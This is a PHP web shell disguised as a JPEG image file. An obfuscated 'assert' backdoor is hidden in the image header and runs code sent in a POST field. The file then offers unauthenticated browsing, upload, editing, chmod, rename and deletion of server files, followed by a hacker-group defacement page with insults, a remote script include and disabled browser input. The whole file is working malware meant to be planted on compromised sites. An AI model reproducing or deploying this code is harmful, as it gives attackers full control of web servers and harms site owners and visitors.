ooxy.php

1. ?? JFIF
   
   
   ` ` ? C 
2. 
3. 
4.  
5. 
6. ? C
     
7.  
8. ?  N j
   " 
   
   ? 
   
   
   
   
   
   
   
   
9. ? ? 
   
   }
    !1AQa"q2亼?#B绷R佯$3br?
10. %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz儎厗噲墛挀敃枟槞殺￥ウЖ┆渤吹斗腹郝媚牌侨墒矣哉肿刭卺忏溴骁栝犟蝮趱鲼?? 
    
    
    
    
    
    
    
    
    
    
    
11. ? ? 
    
    w
    !1AQaq"2?B憽绷 #3R?br?$4??&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz們剠唶垑姃摂晼棙櫄ⅲぅΗī炒刀犯购旅呐魄壬室釉罩棕仝忏溴骁栝牝篝貊鼬? 
     ? 齋( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( (<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['admins']);?>
12. <?php
13. set_time_limit(0);
14. error_reporting(0);
15.  
16. if(get_magic_quotes_gpc()){
17. foreach($_POST as $key=>$value){
18. $_POST[$key] = stripslashes($value);
19. }
20. }
21. echo '<html><head>
22. <link rel="SHORTCUT ICON" href="http://goenk.wapgem.com/idb.png">
23. <body>
24. <style type="text/css">
25. body {
26. background: black;
27. color: #00FF00;
28. font-family: monospace;
29. }
30.  
31. .accessGranted {
32. position: absolute;
33. top: 200px;
34. background: #333;
35. padding: 20px;
36. border: 1px solid #999;
37. width: 300px;
38. left: 50%;
39. margin-left: -150px;
40. text-align: center;
41. }
42.  
43. .accessDenied {
44. position: absolute;
45. top: 200px;
46. color: #F00;
47. background: #511;
48. padding: 20px;
49. border: 1px solid #F00;
50. width: 300px;
51. left: 50%;
52. margin-left: -150px;
53. text-align: center;
54. }
55. #content-center {
56. width: 400px;
57. padding: 0px 10px 10px 10px;
58. width: 800px;
59. margin: 0 auto;
60. }
61. #content-left {
62. margin: 0 auto;
63. text-align: left;
64. }
65. #content-right {
66. margin: 0 auto;
67. text-align: right;
68. }
69. input,select,textarea{
70. border:0;
71. border:1px solid #900;
72. background:black;
73. margin:0;
74. color: white;
75.  
76. padding:2px 4px;
77. }
78. input:hover,textarea:hover,select:hover{
79. background:black;
80. color: blue;
81.  
82. border:1px solid #f00;
83. }
84. a{ text-decoration:none; color:red;}
85. </style>
86. </head>
87. <H1><center></center></H1>
88. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
89. <tr><td>Path : ';
90. if(isset($_GET['path'])){
91. $path = $_GET['path'];
92. }else{
93. $path = getcwd();
94. }
95. $path = str_replace('\\','/',$path);
96. $paths = explode('/',$path);
97.  
98. foreach($paths as $id=>$pat){
99. if($pat == '' && $id == 0){
100. $a = true;
101. echo '<a href="?path=/">/</a>';
102. continue;
103. }
104. if($pat == '') continue;
105. echo '<a href="?path=';
106. for($i=0;$i<=$id;$i++){
107. echo "$paths[$i]";
108. if($i != $id) echo "/";
109. }
110. echo '">'.$pat.'</a>/';
111. }
112. echo '</td></tr><tr><td>';
113. if(isset($_FILES['file'])){
114. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
115. echo '<font color="green">OK COK SUKSESS !!</font><br />';
116. }else{
117. echo '<font color="red">ASU RAIMU ELK :P</font><br />';
118. }
119. }
120. echo '<form enctype="multipart/form-data" method="POST">
121. Upload File : <input type="file" name="file" />
122. <input type="submit" value="upload" />
123. </form>
124. </td></tr>';
125. if(isset($_GET['filesrc'])){
126. echo "<tr><td>Current File : ";
127. echo $_GET['filesrc'];
128. echo '</tr></td></table><br />';
129. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
130. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
131. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
132. if($_POST['opt'] == 'chmod'){
133. if(isset($_POST['perm'])){
134. if(chmod($_POST['path'],$_POST['perm'])){
135. echo '<font color="green">Change Permission Done.</font><br />';
136. }else{
137. echo '<font color="red">Change Permission Error.</font><br />';
138. }
139. }
140. echo '<form method="POST">
141. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
142. <input type="hidden" name="path" value="'.$_POST['path'].'">
143. <input type="hidden" name="opt" value="chmod">
144. <input type="submit" value="Go" />
145. </form>';
146. }elseif($_POST['opt'] == 'rename'){
147. if(isset($_POST['newname'])){
148. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
149. echo '<font color="green">Change Name Done.</font><br />';
150. }else{
151. echo '<font color="red">Change Name Error.</font><br />';
152. }
153. $_POST['name'] = $_POST['newname'];
154. }
155. echo '<form method="POST">
156. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
157. <input type="hidden" name="path" value="'.$_POST['path'].'">
158. <input type="hidden" name="opt" value="rename">
159. <input type="submit" value="Go" />
160. </form>';
161. }elseif($_POST['opt'] == 'edit'){
162. if(isset($_POST['src'])){
163. $fp = fopen($_POST['path'],'w');
164. if(fwrite($fp,$_POST['src'])){
165. echo '<font color="green">Edit File Done.</font><br />';
166. }else{
167. echo '<font color="red">Edit File Error.</font><br />';
168. }
169. fclose($fp);
170. }
171. echo '<form method="POST">
172. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
173. <input type="hidden" name="path" value="'.$_POST['path'].'">
174. <input type="hidden" name="opt" value="edit">
175. <input type="submit" value="Go" />
176. </form>';
177. }
178. echo '</center>';
179. }else{
180. echo '</table><br /><center>';
181. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
182. if($_POST['type'] == 'dir'){
183. if(rmdir($_POST['path'])){
184. echo '<font color="green">Delete Dir Done.</font><br />';
185. }else{
186. echo '<font color="red">Delete Dir Error.</font><br />';
187. }
188. }elseif($_POST['type'] == 'file'){
189. if(unlink($_POST['path'])){
190. echo '<font color="green">Delete File Done.</font><br />';
191. }else{
192. echo '<font color="red">Delete File Error.</font><br />';
193. }
194. }
195. }
196. echo '</center>';
197. $scandir = scandir($path);
198. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
199. <tr class="first">
200. <td><center>Name</center></td>
201. <td><center>Size</center></td>
202. <td><center>Permissions</center></td>
203. <td><center>Options</center></td>
204. </tr>';
205.  
206. foreach($scandir as $dir){
207. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
208. echo "<tr>
209. <td><a href=\"?path=$path/$dir\">$dir</a></td>
210. <td><center>--</center></td>
211. <td><center>";
212. if(is_writable("$path/$dir")) echo '<font color="green">';
213. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
214. echo perms("$path/$dir");
215. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
216.  
217. echo "</center></td>
218. <td><center><form method=\"POST\" action=\"?option&path=$path\">
219. <select name=\"opt\">
220. <option value=\"\"></option>
221. <option value=\"delete\">Delete</option>
222. <option value=\"chmod\">Chmod</option>
223. <option value=\"rename\">Rename</option>
224. </select>
225. <input type=\"hidden\" name=\"type\" value=\"dir\">
226. <input type=\"hidden\" name=\"name\" value=\"$dir\">
227. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
228. <input type=\"submit\" value=\">\" />
229. </form></center></td>
230. </tr>";
231. }
232. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
233. foreach($scandir as $file){
234. if(!is_file("$path/$file")) continue;
235. $size = filesize("$path/$file")/1024;
236. $size = round($size,3);
237. if($size >= 1024){
238. $size = round($size/1024,2).' MB';
239. }else{
240. $size = $size.' KB';
241. }
242.  
243. echo "<tr>
244. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
245. <td><center>".$size."</center></td>
246. <td><center>";
247. if(is_writable("$path/$file")) echo '<font color="green">';
248. elseif(!is_readable("$path/$file")) echo '<font color="red">';
249. echo perms("$path/$file");
250. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
251. echo "</center></td>
252. <td><center><form method=\"POST\" action=\"?option&path=$path\">
253. <select name=\"opt\">
254. <option value=\"\"></option>
255. <option value=\"delete\">Delete</option>
256. <option value=\"chmod\">Chmod</option>
257. <option value=\"rename\">Rename</option>
258. <option value=\"edit\">Edit</option>
259. </select>
260. <input type=\"hidden\" name=\"type\" value=\"file\">
261. <input type=\"hidden\" name=\"name\" value=\"$file\">
262. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
263. <input type=\"submit\" value=\">\" />
264. </form></center></td>
265. </tr>";
266. }
267. echo '</table>
268. </div>';
269. }
270. echo '
271. </BODY>
272. </HTML>';
273. function perms($file){
274. $perms = fileperms($file);
275.  
276. if (($perms & 0xC000) == 0xC000) {
277. // Socket
278. $info = 's';
279. } elseif (($perms & 0xA000) == 0xA000) {
280. // Symbolic Link
281. $info = 'l';
282. } elseif (($perms & 0x8000) == 0x8000) {
283. // Regular
284. $info = '-';
285. } elseif (($perms & 0x6000) == 0x6000) {
286. // Block special
287. $info = 'b';
288. } elseif (($perms & 0x4000) == 0x4000) {
289. // Directory
290. $info = 'd';
291. } elseif (($perms & 0x2000) == 0x2000) {
292. // Character special
293. $info = 'c';
294. } elseif (($perms & 0x1000) == 0x1000) {
295. // FIFO pipe
296. $info = 'p';
297. } else {
298. // Unknown
299. $info = 'u';
300. }
301.  
302. // Owner
303. $info .= (($perms & 0x0100) ? 'r' : '-');
304. $info .= (($perms & 0x0080) ? 'w' : '-');
305. $info .= (($perms & 0x0040) ?
306. (($perms & 0x0800) ? 's' : 'x' ) :
307. (($perms & 0x0800) ? 'S' : '-'));
308.  
309. // Group
310. $info .= (($perms & 0x0020) ? 'r' : '-');
311. $info .= (($perms & 0x0010) ? 'w' : '-');
312. $info .= (($perms & 0x0008) ?
313. (($perms & 0x0400) ? 's' : 'x' ) :
314. (($perms & 0x0400) ? 'S' : '-'));
315.  
316. // World
317. $info .= (($perms & 0x0004) ? 'r' : '-');
318. $info .= (($perms & 0x0002) ? 'w' : '-');
319. $info .= (($perms & 0x0001) ?
320. (($perms & 0x0200) ? 't' : 'x' ) :
321. (($perms & 0x0200) ? 'T' : '-'));
322.  
323. return $info;
324. }
325. $htcs = "
326. <html>
327. <head>
328. <title>Cardiman Asooooh !</title><link href='http://kefiex.yu.tl/files/bnx.png' rel='shortcut icon'/>
329. <meta content='IDBTE4M' name='description'/>
330. <meta content='IDBTE4M' name='keywords'/>
331. <meta content='IDBTE4M' name='Abstract'/>
332. <meta name='title' content='kefiex404'>
333.  
334. <link href='http://fonts.googleapis.com/css?family=Iceland:400,700' rel='stylesheet' type='text/css'>
335. <link href='http://fonts.googleapis.com/css?family=Verdana:400,700' rel='stylesheet' type='text/css'>
336. <link href='http://fonts.googleapis.com/css?family=Rockwell Condensed:400,700' rel='stylesheet' type='text/css'>
337. <link href='http://fonts.googleapis.com/css?family=Courier New:400,700' rel='stylesheet' type='text/css'>
338. <head>
339. <html>
340. <center><embed src='https://www.youtube.com/v/8-HC3iUXw34?rel=0&amp;autoplay=1&image=http://3.bp.blogspot.com/-RkTUcTZVXTY/UKgyroYk_xI/AAAAAAAAAF8/gUR3-QONm44/s1600/Untitled.png&repeat=always&autostart=true&frontcolor=cccccc&lightcolor=428cdb&backcolor=111111' width='1' height='1 allowscriptaccess='always'></embed></center>
341. <script language='JavaScript'>
342. function tb5_makeArray(n){
343. this.length = n;
344. return this.length;
345. }
346.  
347. tb5_messages = new tb5_makeArray(1);
348. tb5_messages[0] = 'Cardiman Asoooooooooh :v';
349. tb5_rptType = 'infinite';
350. tb5_rptNbr = 10;
351. tb5_speed = 50;
352. tb5_delay = 2000;
353. var tb5_counter=1;
354. var tb5_currMsg=0;
355. var tb5_stsmsg='';
356. function tb5_shuffle(arr){
357. var k;
358. for (i=0; i<arr.length; i++){
359. k = Math.round(Math.random() * (arr.length - i - 1)) + i;
360. temp = arr[i];arr[i]=arr[k];arr[k]=temp;
361. }
362. return arr;
363. }
364. tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
365. tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
366. for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){
367. tb5_arr[i] = i;
368. tb5_sts[i] = '_';
369. }
370. tb5_arr = tb5_shuffle(tb5_arr);
371. function tb5_init(n){
372. var k;
373. if (n == tb5_arr.length){
374. if (tb5_currMsg == tb5_messages.length-1){
375. if ((tb5_rptType == 'finite') && (tb5_counter==tb5_rptNbr)){
376. clearTimeout(tb5_timerID);
377. return;
378. }
379. tb5_counter++;
380. tb5_currMsg=0;
381. }
382. else{
383. tb5_currMsg++;
384. }
385. n=0;
386. tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
387. tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
388. for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){
389. tb5_arr[i] = i;
390. tb5_sts[i] = '_';
391. }
392. tb5_arr = tb5_shuffle(tb5_arr);
393. tb5_sp=tb5_delay;
394. }
395. else{
396. tb5_sp=tb5_speed;
397. k = tb5_arr[n];
398. tb5_sts[k] = tb5_messages[tb5_currMsg].charAt(k);
399. tb5_stsmsg = '';
400. for (var i=0; i<tb5_sts.length; i++)
401. tb5_stsmsg += tb5_sts[i];
402. document.title = tb5_stsmsg;
403. n++;
404. }
405. tb5_timerID = setTimeout('tb5_init('+n+')', tb5_sp);
406. }
407. function tb5_randomizetitle(){
408. tb5_init(0);
409. }
410. tb5_randomizetitle();
411.  
412. </script>
413. <body bgcolor='black'>
414. <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
415. <meta name='google-site-verification' content='#Save Promagh'/>
416. <meta name='google-site-verification' content='#Save Promagh'/>
417. <meta name='google-site-verification' content='#Save Promagh'/>
418. <meta name='google-site-verification' content='#Save Promagh'/>
419. <meta http-equiv='Content-Language' content='en-us-id'>
420. <meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1' />
421. <meta http-equiv='Content-Type' content='text/html; charset=windows-1252'>
422. <Meta http-equiv='content-type' content='text/html; charset=windows-1254'>
423. <Meta http-equiv='content-type' content='text/html; charset=ISO-8859-9'>
424. <meta name='author' content='#Save Promagh'>
425. <meta name='copyright' content='#Save Promagh'/>
426. <meta name='description' content='#Save Promagh'>
427. <meta name='robots schedule' content='auto'>
428. <link href='http://fonts.googleapis.com/css?family=Abel:700' rel='stylesheet' type='text/css'>
429. <link href='http://fonts.googleapis.com/css?family=Abel:400' rel='stylesheet' type='text/css'>
430. <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
431. <link href='http://fonts.googleapis.com/css?family=Wallpoet' rel='stylesheet' type='text/css'>
432. <link href='http://fonts.googleapis.com/css?family=Creepster' rel='stylesheet' type='text/css'>
433.  
434. <script type='text/javascript'> var SPklikkanan = 'TILANG';</script> <script type='text/javascript' src='https://googledrive.com/host/0B6KVua7D2SLCNDN2RW1ORmhZRWs/sp_tilang.js'></script>
435. <script type='text/javascript'> if (typeof document.onselectstart!='undefined') { document.onselectstart=new Function ('return false'); } else{ document.onmousedown=new Function ('return false'); document.onmouseup=new Function ('return true'); } </SCRIPT>
436.  
437. <br><br><br> <center> <a rel='dofollow' href='https://www.google.co.id/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=indonesian+Hacker+rulez'> <img src='https://scontent-sin1-1.xx.fbcdn.net/hphotos-xal1/v/t1.0-9/12376796_565593456950242_7474357900886665426_n.jpg?oh=1db7c5d4e3fa5b7bc7b422a648b5decb&oe=574CE85B' style='opacity:0.4;filter:alpha(opacity=40)' onmouseover='this.style.opacity=1;this.filters.alpha.opacity=100' onmouseout='this.style.opacity=0.4;this.filters.alpha.opacity=40' height='360' width='670'><br></a> </center>
438. <br> <center> <font face='iceland' size='10' color='red'> -=[ TEMAN ??? YAKIN LU TEMEN GUA ??? ]=-</font> </center>
439. <br> <center> <font face='iceland' size='10' color='silver'> #Save Promagh</font> </center>
440. </center>
441. <b><font color='blue' face='consolas' size='4'>
442. <p align='center' class='style2'><font face='Trajan Pro' size='4' color='Green' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='yellow'>
443. -=[[ MY FAMILY ]]=-<br>-| ./KEFIEX404 | MANIAK KASUR | MR.K | EL-RO | ./COCO | TUAN GALAU | DEDEMIT ID | NO SCRIPT 404 |- <br> -| K3C0T | SIM0D | LITLE H4XORZ | Antonio HsH |-</font><p>
444. <center><table width='100%' border='2'><tr><td width='10%' align='center'><blink><font Class-'glow' color='white'><code>MY FRIENDS : </code></font></blink></td><td width='90%'><font color='yellow' size='4'><marquee><code>
445. [.] X-Wu7z [.] Tuan_galau [.] GrenXPaRTa [.] x'1n73ct [.] m@db100d [.] Hacker Sakit Hati [.] ./$amndan404 [.] ./wi.na [.] Neneng Juhairiah[ .] Mr_Oxygen [.] ./coco [.] H3ri.ID [.] Ice Cream [.] newbie patah hati [.] Naughty_r00tz [.] DarkWireless [.] ./czw_07 [.] ./TanpaNama404 [.] xCut10n [.] Kucing Galau [.] ./anjirGBX [.] Dicky Injector [.] jepry_vuln [.] Shut_Down404 [.] Mr.404_NotFound [.] Mr.LittleHaxor [.] Mr.Ghostteror_404 [.] Mr.Dork [.] Mr.aji.192 [.] L4W_CyberDKSH404.Not_Found [.] ozlok [.] Bloc_Anon/404 [.] R3DD3V1L [.] mr.cookie_302 [.]</code></marquee></font></td></tr></table><html><center>
446.  
447. <script>
448. function muter2(){
449. scrW=screen.availWidth
450. scrH=screen.availHeight
451. window.moveTo(0,0)
452. window.resizeTo(10,10)
453. window.focus()
454. for(x=0;x<80;x++){
455. window.resizeTo(10,scrH*x/80)
456. }
457. for(y=0;y<80;y++){
458. window.resizeTo(scrW*y/80,scrH)
459. }
460. window.resizeTo(scrW,scrH)
461. }
462. document.oncontextmenu=new Function('muter2();return false');
463. function keypressed(){alert('halah ....
464.  
465. mbuh ya kok yo podo micek ??/
466.  
467. padahal dee dewe yo meneng meneng ngecard :v
468.  
469. oalah asoooooooooooh :v ');}
470. document.onkeydown=keypressed;
471. function kasih_tau(){
472. alert('matamu picek :v/
473. jancok torok empek asooooooh :v
474. opo ??? ra trimo ???
475.  
476. tokno kabeh skillmu :v ....
477. jancok :v
478.  
479. ');
480. }
481. </script>
482. </body>
483. </html>
484. ";
485. $f =@fopen ('','w');
486. fwrite($f , $htcs);
487. $pg = basename(__FILE__);
488.  
489. ?>